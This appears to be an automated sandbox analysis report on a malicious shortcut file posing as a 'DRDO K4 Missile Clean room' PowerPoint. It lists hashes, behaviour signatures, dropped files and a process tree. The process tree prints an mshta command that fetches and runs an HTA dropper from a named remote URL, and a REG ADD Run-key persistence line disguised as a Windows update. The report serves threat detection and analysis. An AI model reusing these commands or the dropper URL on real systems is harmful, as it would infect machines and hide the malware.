Analysis

  • max time kernel
    40s
  • max time network
    104s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
  • submitted
    10-03-2023 12:02

General

  • Target
    DRDO-K4-Missile-Clean-room/DRDO - K4 Missile Clean room.pptx.lnk
  • Size
    70KB
  • MD5
    ab11b91f97d7672da1c5b42c9ecc6d2e
  • SHA1
    feeadc91373732d65883c8351a6454a77a063ff5
  • SHA256
    a2e55cbd385971904abf619404be7ee8078ce9e3e46226d4d86d96ff31f6bb9a
  • SHA512
    d788a83a323d04b9c43328d36adcc2ffc3b7fd52e1bdec3f7bbd7c9c14bb66d75003ea8df5a9ba60b798f5aacbfb684a4955c0b806347b1809f7290e75b826d9
  • SSDEEP
    1536:ENN7MHOvYUpOQH8a8U2OPzCSyfU4YoBJrOZwHPnlThtIApDkU:hHOvY548a8Uxm5sx4JrOZIPlTHL

Score
10/10

Malware Config

Extracted

  • Language
    hta
  • Source
    URLs
  • hta.dropper
    https://cornerstonebeverly.org/js/files/docufentososo/doecumentosoneso

Signatures

  • Blocklisted process makes network request 8 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 11 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\DRDO-K4-Missile-Clean-room\DRDO - K4 Missile Clean room.pptx.lnk"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1148
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://cornerstonebeverly.org/js/files/docufentososo/doecumentosoneso
      2⤵
      • Blocklisted process makes network request
      • Modifies Internet Explorer settings
      • Modifies system certificate store
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1484
      • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
        "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\DRDO - K4 Missile Clean room.pptx"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1868
        • C:\Windows\splwow64.exe
          C:\Windows\splwow64.exe 12288
          4⤵
            PID:1804
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\HP\jquery.hta"
          3⤵
          • Loads dropped DLL
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1048
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\test.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:340
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Update Schedule" /t REG_SZ /F /D "C:\Users\Public\hp\cridviz.exe"
              5⤵
              • Adds Run key to start application
              PID:1824
          • C:\Users\Public\hp\cridviz.exe
            "C:\Users\Public\hp\cridviz.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:2020

Downloads

  • C:\ProgramData\HP\jquery.hta
    Filesize
    177KB
    MD5
    036da574b5967c71951f4e14d000398c
    SHA1
    e612dbb34e01b41e46359019db9340e17e0390b8
    SHA256
    85faf414ed0ba9c58b9e7d4dc7388ba5597598c93b701d367d8382717fb485ec
    SHA512
    1afbfd044a039109d5d5f8f451307fdb83f66128c5b33d06c3685aabb2efbf97009680128b2f9e901b43d2f852d615e25c8012b6e7c67cbdaca7fe43c5945955

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize
    61KB
    MD5
    e71c8443ae0bc2e282c73faead0a6dd3
    SHA1
    0c110c1b01e68edfacaeae64781a37b1995fa94b
    SHA256
    95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72
    SHA512
    b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

  • C:\Users\Admin\AppData\Local\Temp\DRDO - K4 Missile Clean room.pptx
    Filesize
    1.6MB
    MD5
    24f210da9fb419ea30c2d435a3dfd469
    SHA1
    7143a1071708fdc4be06b0b8f5fdcb66ec8d8f93
    SHA256
    b9514ed1566c8ce46ab5bfd665f8b997f2d5624740f298699df43bb108e08c4d
    SHA512
    77944b204b644c2b74b3f6deb5f78229ac78bb4bebc19e6ffb65db1003773b2373ec4cd6255914d397bc4a797c2014804e297efd25845aebaa5492574a453a84

  • C:\Users\Admin\AppData\Local\Temp\Tar30F8.tmp
    Filesize
    161KB
    MD5
    be2bec6e8c5653136d3e72fe53c98aa3
    SHA1
    a8182d6db17c14671c3d5766c72e58d87c0810de
    SHA256
    1919aab2a820642490169bdc4e88bd1189e22f83e7498bf8ebdfb62ec7d843fd
    SHA512
    0d1424ccdf0d53faf3f4e13d534e12f22388648aa4c23edbc503801e3c96b7f73c7999b760b5bef4b5e9dd923dffe21a21889b1ce836dd428420bf0f4f5327ff

  • C:\Users\Admin\AppData\Local\Temp\test.bat
    Filesize
    151B
    MD5
    05f9ac07249121d89cd4416ef466671c
    SHA1
    1e35984ccc3f685d05996a9383b0dfa297bfa571
    SHA256
    f0cc9b18ba32f95085d5f9a3539dc08832c19e7d3124a5febbdc3bae47deab24
    SHA512
    456c0133e5ecbc25137fa2bdcf524947cd5afb976a872279f4ba30ae3d64a0af0049b163f2319587f4cbf54a5d1b60943f4bd16528e3343af6e6e6fcf0133aa1

  • C:\Users\Public\hp\DUser.dll
    Filesize
    226KB
    MD5
    2e19b7a2bbdc8082024d259e27e86911
    SHA1
    3c4c8cbab1983c775e6a76166f7b3c84dde8c8c5
    SHA256
    865e041b41b9c370a4eed91a9a407bd44a94e16e236e07be05e87de319a4486c
    SHA512
    9e87e0a1bb0181a0f705bd2dff6d092e4355c2ee1e689d98f642fc9529f07f3f6de68cd376afea901e90dd784de9b1b1bcb4144eba88a90297b6c6cdd2203703

  • C:\Users\Public\hp\cridviz.exe
    Filesize
    27KB
    MD5
    15cf85c3d904a7d8650164b0b831a318
    SHA1
    4d160e93273ac909fe2aa0ee9d25c905dec43082
    SHA256
    17eabfb88a164aa95731f198bd69a7285cc7f64acd7c289062cd3979a4a2f5bf
    SHA512
    c4c86f2d1665c9b7d7a5fa6ce53bb67df9ba0e8448c310b833fbcb6da42cccaa8e43b36f8d8a79c82f689fbf2ea2ce5a3294c8f96c3099f4239c968f956e1d4f

  • \Users\Public\hp\DUser.dll
    Filesize
    226KB
    MD5
    2e19b7a2bbdc8082024d259e27e86911
    SHA1
    3c4c8cbab1983c775e6a76166f7b3c84dde8c8c5
    SHA256
    865e041b41b9c370a4eed91a9a407bd44a94e16e236e07be05e87de319a4486c
    SHA512
    9e87e0a1bb0181a0f705bd2dff6d092e4355c2ee1e689d98f642fc9529f07f3f6de68cd376afea901e90dd784de9b1b1bcb4144eba88a90297b6c6cdd2203703

  • \Users\Public\hp\cridviz.exe
    Filesize
    27KB
    MD5
    15cf85c3d904a7d8650164b0b831a318
    SHA1
    4d160e93273ac909fe2aa0ee9d25c905dec43082
    SHA256
    17eabfb88a164aa95731f198bd69a7285cc7f64acd7c289062cd3979a4a2f5bf
    SHA512
    c4c86f2d1665c9b7d7a5fa6ce53bb67df9ba0e8448c310b833fbcb6da42cccaa8e43b36f8d8a79c82f689fbf2ea2ce5a3294c8f96c3099f4239c968f956e1d4f

  • memory/1048-163-0x0000000003830000-0x000000000383A000-memory.dmp
    Filesize
    40KB

  • memory/1048-165-0x0000000007470000-0x00000000074B0000-memory.dmp
    Filesize
    256KB

  • memory/1484-151-0x0000000006120000-0x00000000061A0000-memory.dmp
    Filesize
    512KB

  • memory/1484-149-0x0000000006120000-0x00000000061A0000-memory.dmp
    Filesize
    512KB

  • memory/1484-147-0x0000000003B80000-0x0000000003B88000-memory.dmp
    Filesize
    32KB

  • memory/1868-150-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize
    64KB

  • memory/1868-162-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize
    64KB